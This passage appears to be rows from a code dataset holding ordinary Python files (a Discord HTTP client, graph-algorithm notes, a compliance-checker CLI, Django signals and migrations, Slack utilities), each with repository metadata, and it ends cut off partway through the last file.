point3d append(self, x) empty(self) -> bool size(self) -> std::vector< Reconstruction::point3d >::size_type swap(self, v) begin(self) -> std::vector< Reconstruction::point3d >::iterator end(self) -> std::vector< Reconstruction::point3d >::iterator rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator clear(self) get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type pop_back(self) erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator __init__(self) -> Point3dVector __init__(self, arg2) -> Point3dVector __init__(self, size) -> Point3dVector __init__(self, size, value) -> Point3dVector push_back(self, x) front(self) -> point3d back(self) -> point3d assign(self, n, x) resize(self, new_size) resize(self, new_size, x) insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator insert(self, pos, n, x) reserve(self, n) capacity(self) -> std::vector< Reconstruction::point3d >::size_type Proxy of C++ std::vector<(Reconstruction::track)> class. iterator(self) -> SwigPyIterator __nonzero__(self) -> bool __bool__(self) -> bool __len__(self) -> std::vector< Reconstruction::track >::size_type __getslice__(self, i, j) -> TrackVector __setslice__(self, i, j) __setslice__(self, i, j, v) __delslice__(self, i, j) __delitem__(self, i) __delitem__(self, slice) __getitem__(self, slice) -> TrackVector __getitem__(self, i) -> track __setitem__(self, slice, v) __setitem__(self, slice) __setitem__(self, i, x) pop(self) -> track append(self, x) empty(self) -> bool size(self) -> std::vector< Reconstruction::track >::size_type swap(self, v) begin(self) -> std::vector< Reconstruction::track >::iterator end(self) -> std::vector< Reconstruction::track >::iterator rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator rend(self) -> std::vector< Reconstruction::track >::reverse_iterator clear(self) get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type pop_back(self) erase(self, pos) -> std::vector< Reconstruction::track >::iterator erase(self, first, last) -> std::vector< Reconstruction::track >::iterator __init__(self) -> TrackVector __init__(self, arg2) -> TrackVector __init__(self, size) -> TrackVector __init__(self, size, value) -> TrackVector push_back(self, x) front(self) -> track back(self) -> track assign(self, n, x) resize(self, new_size) resize(self, new_size, x) insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator insert(self, pos, n, x) reserve(self, n) capacity(self) -> std::vector< Reconstruction::track >::size_type # This file is compatible with both classic and new-style classes. | 1.889153 | 2 |
restcord/http.py | Yandawl/restcord.py | 4 | 9181 | # -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
| # -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
| en | 0.26964 | # -*- coding: utf-8 -*- :class:`ClientSession`: The aiohttp ClientSession. | 2.240156 | 2 |
notes/algo-ds-practice/problems/graph/mother_vertex.py | Anmol-Singh-Jaggi/interview-notes | 6 | 9182 | <reponame>Anmol-Singh-Jaggi/interview-notes
'''
What is a Mother Vertex?
A mother vertex in a graph G = (V,E) is a vertex v such that all other vertices in G can be reached by a path from v.
How to find mother vertex?
Case 1:- Undirected Connected Graph : In this case, all the vertices are mother vertices as we can reach to all the other nodes in the graph.
Case 2:- Undirected/Directed Disconnected Graph : In this case, there is no mother vertices as we cannot reach to all the other nodes in the graph.
Case 3:- Directed Connected Graph : In this case, we have to find a vertex -v in the graph such that we can reach to all the other nodes in the graph through a directed path.
SOLUTION:
If there exist mother vertex (or vertices), then one of the mother vertices is the last finished vertex in DFS. (Or a mother vertex has the maximum finish time in DFS traversal).
A vertex is said to be finished in DFS if a recursive call for its DFS is over, i.e., all descendants of the vertex have been visited.
Algorithm :
Do DFS traversal of the given graph. While doing traversal keep track of last finished vertex ‘v’. This step takes O(V+E) time.
If there exist mother vertex (or vetices), then v must be one (or one of them). Check if v is a mother vertex by doing DFS/BFS from v. This step also takes O(V+E) time.
Note that there is no need to literally store the finish time for each vertex.
We can just do:
...
...
if node not in visited:
dfs(node)
latest = node
...
...
# Check if latest is indeed a mother vertex.
'''
| '''
What is a Mother Vertex?
A mother vertex in a graph G = (V,E) is a vertex v such that all other vertices in G can be reached by a path from v.
How to find mother vertex?
Case 1:- Undirected Connected Graph : In this case, all the vertices are mother vertices as we can reach to all the other nodes in the graph.
Case 2:- Undirected/Directed Disconnected Graph : In this case, there is no mother vertices as we cannot reach to all the other nodes in the graph.
Case 3:- Directed Connected Graph : In this case, we have to find a vertex -v in the graph such that we can reach to all the other nodes in the graph through a directed path.
SOLUTION:
If there exist mother vertex (or vertices), then one of the mother vertices is the last finished vertex in DFS. (Or a mother vertex has the maximum finish time in DFS traversal).
A vertex is said to be finished in DFS if a recursive call for its DFS is over, i.e., all descendants of the vertex have been visited.
Algorithm :
Do DFS traversal of the given graph. While doing traversal keep track of last finished vertex ‘v’. This step takes O(V+E) time.
If there exist mother vertex (or vetices), then v must be one (or one of them). Check if v is a mother vertex by doing DFS/BFS from v. This step also takes O(V+E) time.
Note that there is no need to literally store the finish time for each vertex.
We can just do:
...
...
if node not in visited:
dfs(node)
latest = node
...
...
# Check if latest is indeed a mother vertex.
''' | en | 0.944828 | What is a Mother Vertex? A mother vertex in a graph G = (V,E) is a vertex v such that all other vertices in G can be reached by a path from v. How to find mother vertex? Case 1:- Undirected Connected Graph : In this case, all the vertices are mother vertices as we can reach to all the other nodes in the graph. Case 2:- Undirected/Directed Disconnected Graph : In this case, there is no mother vertices as we cannot reach to all the other nodes in the graph. Case 3:- Directed Connected Graph : In this case, we have to find a vertex -v in the graph such that we can reach to all the other nodes in the graph through a directed path. SOLUTION: If there exist mother vertex (or vertices), then one of the mother vertices is the last finished vertex in DFS. (Or a mother vertex has the maximum finish time in DFS traversal). A vertex is said to be finished in DFS if a recursive call for its DFS is over, i.e., all descendants of the vertex have been visited. Algorithm : Do DFS traversal of the given graph. While doing traversal keep track of last finished vertex ‘v’. This step takes O(V+E) time. If there exist mother vertex (or vetices), then v must be one (or one of them). Check if v is a mother vertex by doing DFS/BFS from v. This step also takes O(V+E) time. Note that there is no need to literally store the finish time for each vertex. We can just do: ... ... if node not in visited: dfs(node) latest = node ... ... # Check if latest is indeed a mother vertex. | 3.758222 | 4 |
app/config.py | MoShitrit/kubernetes-controller-example | 0 | 9183 | <filename>app/config.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
class Config:
api_group = os.environ.get('API_GROUP', 'hello-k8s.s5t.dev')
auth_method = os.environ.get("AUTH_METHOD", "cluster")
examples_plural = os.environ.get('API_PLURAL', 'examples')
examples_version = os.environ.get('API_VERSION', 'v1alpha1')
log_level = os.environ.get("LOG_LEVEL", "INFO")
namespace = os.environ.get('NAMESPACE', 'default')
version = '1.0.0'
def main():
pass
if __name__ == "__main__":
main()
| <filename>app/config.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
class Config:
api_group = os.environ.get('API_GROUP', 'hello-k8s.s5t.dev')
auth_method = os.environ.get("AUTH_METHOD", "cluster")
examples_plural = os.environ.get('API_PLURAL', 'examples')
examples_version = os.environ.get('API_VERSION', 'v1alpha1')
log_level = os.environ.get("LOG_LEVEL", "INFO")
namespace = os.environ.get('NAMESPACE', 'default')
version = '1.0.0'
def main():
pass
if __name__ == "__main__":
main()
| en | 0.352855 | #!/usr/bin/env python # -*- coding: utf-8 -*- | 1.837862 | 2 |
mechanical_markdown/parsers.py | greenie-msft/mechanical-markdown | 0 | 9184 | <gh_stars>0
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
self.external_links.append((link, self.ignore_links))
| """
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
self.external_links.append((link, self.ignore_links)) | en | 0.811928 | Copyright (c) Microsoft Corporation. Licensed under the MIT License. | 2.582035 | 3 |
cchecker.py | jakepolatty/compliance-checker | 0 | 9185 | <filename>cchecker.py<gh_stars>0
#!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
sys.exit(main())
| <filename>cchecker.py<gh_stars>0
#!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
" formats is that the 'json' format has the check as the top level"
" key, whereas the 'json_new' format has the dataset name(s) as the"
" main key in the output follow by any checks as subkeys. Also, "
"'json' format can be only be run against one input file, whereas "
"'json_new' can be run against multiple files."))
parser.add_argument('-o', '--output', default=[], action='append',
help=("Output filename(s). If '-' is supplied, output to stdout."
" Can either be one or many files. If one file is supplied,"
" but the checker is run against many files, all the output"
" from the checks goes to that file (does not presently work "
"with 'json' format). If more than one output file is "
"supplied, the number of input datasets supplied must match "
"the number of output files."))
parser.add_argument('-V', '--version', action='store_true',
help='Display the IOOS Compliance Checker version information.')
parser.add_argument('dataset_location', nargs='*',
help="Defines the location of the dataset to be checked.")
parser.add_argument('-l', '--list-tests', action='store_true',
help='List the available tests')
parser.add_argument('-d', '--download-standard-names',
help=("Specify a version of the cf standard name table"
" to download as packaged version"))
args = parser.parse_args()
if args.version:
print("IOOS compliance checker version %s" % __version__)
return 0
if args.list_tests:
print("IOOS compliance checker available checker suites:")
for checker in sorted(check_suite.checkers.keys()):
version = getattr(check_suite.checkers[checker],
'_cc_checker_version', "???")
if args.verbose:
print(" - {} (v{})".format(checker, version))
elif ':' in checker and not checker.endswith(':latest'): # Skip the "latest" output
print(" - {}".format(checker))
return 0
if args.download_standard_names:
download_cf_standard_name_table(args.download_standard_names)
# Check the number of output files
if not args.output:
args.output = '-'
output_len = len(args.output)
if not (output_len == 1 or output_len == len(args.dataset_location)):
print('The number of output files must either be one or the same as the number of datasets', file=sys.stderr)
sys.exit(2)
# Check the output formats
format_choices = ['text', 'html', 'json', 'json_new']
for out_format in args.format:
if out_format not in format_choices:
print(("Error: argument -f/--format: invalid choice: '{}'"
" (choose from 'text', 'html', 'json', 'json_new')".format(out_format)))
sys.exit(2)
# Run the compliance checker
# 2 modes, concatenated output file or multiple output files
return_values = []
had_errors = []
if output_len == 1:
if args.format != 'json':
print("Running Compliance Checker on the datasets from: {}".format(args.dataset_location), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker(args.dataset_location,
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
args.output[0],
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
else:
for output, dataset in zip(args.output, args.dataset_location):
if args.format != 'json':
print("Running Compliance Checker on the dataset from: {}".format(dataset), file=sys.stderr)
return_value, errors = ComplianceChecker.run_checker([dataset],
args.test or ['acdd'],
args.verbose,
args.criteria,
args.skip_checks,
output,
args.format or ['text'])
return_values.append(return_value)
had_errors.append(errors)
if any(had_errors):
return 2
if all(return_values):
return 0
return 1
if __name__ == "__main__":
sys.exit(main())
| en | 0.431284 | #!/usr/bin/env python # Load all available checker classes # Skip the "latest" output # Check the number of output files # Check the output formats # Run the compliance checker # 2 modes, concatenated output file or multiple output files | 2.523664 | 3 |
apps/articles/cms_apps.py | creimers/djangocms-delete-error | 0 | 9186 | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
| from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import gettext as _
class CategoriesAppHook(CMSApp):
name = _("Categories")
def get_urls(self, page=None, language=None, **kwargs):
return ["apps.articles.urls"]
apphook_pool.register(CategoriesAppHook)
| none | 1 | 1.913484 | 2 |
|
bouncer/blacklist/signals.py | sourcelair/bouncer-api | 0 | 9187 | <gh_stars>0
from django.db.models.signals import pre_save
from django.dispatch import receiver
from blacklist import models
from hashlib import sha256
@receiver(pre_save, sender=models.EmailEntry)
def email_entry_handler(sender, instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
instance.lower_case_entry_value = instance.entry_value.lower()
email_hasher = sha256(instance.lower_case_entry_value.encode())
instance.hashed_value = email_hasher.hexdigest().lower()
@receiver(pre_save, sender=models.IPEntry)
@receiver(pre_save, sender=models.EmailHostEntry)
def entry_handler(instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
instance.lower_case_entry_value = instance.entry_value.lower()
| from django.db.models.signals import pre_save
from django.dispatch import receiver
from blacklist import models
from hashlib import sha256
@receiver(pre_save, sender=models.EmailEntry)
def email_entry_handler(sender, instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
instance.lower_case_entry_value = instance.entry_value.lower()
email_hasher = sha256(instance.lower_case_entry_value.encode())
instance.hashed_value = email_hasher.hexdigest().lower()
@receiver(pre_save, sender=models.IPEntry)
@receiver(pre_save, sender=models.EmailHostEntry)
def entry_handler(instance, **kwargs):
"""
Handler that assigns to lower_case_entry_value the entry_value.lower()
"""
instance.lower_case_entry_value = instance.entry_value.lower() | en | 0.286259 | Handler that assigns to lower_case_entry_value the entry_value.lower() Handler that assigns to lower_case_entry_value the entry_value.lower() | 2.174977 | 2 |
app/boardgames/migrations/0001_initial.py | collaer/boardgames | 0 | 9188 | # Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('eidtion_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
]
| # Generated by Django 3.1 on 2020-08-22 17:48
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BoardGame',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('eidtion_year', models.IntegerField()),
('designer', models.CharField(max_length=30)),
('game_duration_min', models.IntegerField()),
('player_number', models.IntegerField()),
('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
]
| en | 0.842925 | # Generated by Django 3.1 on 2020-08-22 17:48 | 1.96069 | 2 |
matcher/utils.py | BlueRidgeLabs/slack-meetups | 12 | 9189 | import re
# regex for a user or channel mention at the beginning of a message
# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
return re.sub(MENTION_PATTERN, "", message, count=1)
| import re
# regex for a user or channel mention at the beginning of a message
